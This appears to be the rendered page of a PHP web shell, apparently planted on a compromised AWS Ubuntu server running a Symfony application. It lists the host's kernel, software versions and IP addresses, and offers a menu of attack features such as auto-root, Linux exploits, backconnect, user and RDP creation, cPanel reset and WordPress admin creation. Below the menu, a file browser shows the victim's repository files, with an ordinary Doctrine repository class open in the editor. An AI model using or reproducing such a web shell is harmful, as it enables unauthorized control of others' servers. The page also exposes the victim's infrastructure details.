Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 13.58.192.154
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
src /
Repository /
[ HOME SHELL ]
Name
Size
Permission
Action
CargoRepository.php
1.95
KB
-rw-rw-r--
DepotRepository.php
2.21
KB
-rw-rw-r--
LoadingRepository.php
1.94
KB
-rw-rw-r--
ReleaseOrderRepository.php
8.66
KB
-rw-rw-r--
SubcargoRepository.php
424
B
-rw-rw-r--
UserDepotRepository.php
3.11
KB
-rw-rw-r--
UserRepository.php
463
B
-rw-rw-r--
googleda794cd9937527d01.html
33
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DepotRepository.php
<?php namespace App\Repository; use App\Entity\Depot; use Doctrine\Bundle\DoctrineBundle\Repository\ServiceEntityRepository; use Doctrine\ORM\QueryBuilder; use Doctrine\Persistence\ManagerRegistry; /** * @method Depot|null find($id, $lockMode = null, $lockVersion = null) * @method Depot|null findOneBy(array $criteria, array $orderBy = null) * @method Depot[] findAll() * @method Depot[] findBy(array $criteria, array $orderBy = null, $limit = null, $offset = null) */ class DepotRepository extends ServiceEntityRepository { public function __construct(ManagerRegistry $registry) { parent::__construct($registry, Depot::class); } public function findNotCheckedIn() { return $this->getEntityManager() ->createQuery( 'SELECT distinct d.id, d.name from App\Entity\Depot d LEFT JOIN App\Entity\UserDepot ud WITH d = ud.depot WHERE d.id NOT IN (SELECT IDENTITY(u.depot) FROM App\Entity\UserDepot u WHERE u.checkout IS NULL)' ) ->getResult(); } // public function findNotCheckedIn() // { // return $this->createQueryBuilder('d') // // ->andWhere('d.exampleField = :val') // ->leftJoin( // 'App\Entity\UserDepot', // 'ud', // \Doctrine\ORM\Query\Expr\Join::WITH, // 'd = ud.depot' // ) // ->getQuery() // ->getResult() // ; // } // /** // * @return Depot[] Returns an array of Depot objects // */ /* public function findByExampleField($value) { return $this->createQueryBuilder('d') ->andWhere('d.exampleField = :val') ->setParameter('val', $value) ->orderBy('d.id', 'ASC') ->setMaxResults(10) ->getQuery() ->getResult() ; } */ /* public function findOneBySomeField($value): ?Depot { return $this->createQueryBuilder('d') ->andWhere('d.exampleField = :val') ->setParameter('val', $value) ->getQuery() ->getOneOrNullResult() ; } */ }
Close